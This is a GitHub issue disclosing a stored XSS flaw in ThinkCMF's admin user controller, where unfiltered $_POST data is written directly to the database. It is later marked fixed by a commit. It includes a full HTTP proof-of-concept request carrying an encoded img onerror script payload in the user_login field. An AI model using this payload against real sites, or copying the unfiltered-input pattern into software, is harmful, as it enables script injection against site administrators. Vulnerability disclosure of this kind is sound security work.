We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
At vendor/thinkcmf/cmf-app/src/admin/controller/UserController.php
There is no filtering of the user's post requests.
For example:
line 138:
$result = DB::name('user')->insertGetId($_POST);
line 221: $result = DB::name('user')->update($_POST);
$result = DB::name('user')->update($_POST);
So There is a Stored XSS vulnerability in user management,
POC:
POST /admin/user/addpost.html HTTP/1.1 Host: test.net Connection: close Content-Length: 115 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://test.net Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://test.net/admin/user/add.html Accept-Encoding: gzip, deflate Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: thinkphp_show_page_trace=0|0; admin_username=admin; PHPSESSID=ju91k4c4do16sl2qqac553edl1 user_login=%3Cimg+src%3D''+onerror%3Dalert(%2Fxss%2F)%3E&user_pass=123456&user_email=1111%40qqq.com&role_id%5B%5D=2
The text was updated successfully, but these errors were encountered:
删了$_POST不规范用法#675,修复XSS漏洞
27e1fbe
fixed
Sorry, something went wrong.
No branches or pull requests
At vendor/thinkcmf/cmf-app/src/admin/controller/UserController.php
There is no filtering of the user's post requests.
For example:
line 138:
$result = DB::name('user')->insertGetId($_POST);line 221:
$result = DB::name('user')->update($_POST);So There is a Stored XSS vulnerability in user management,
POC:
The text was updated successfully, but these errors were encountered: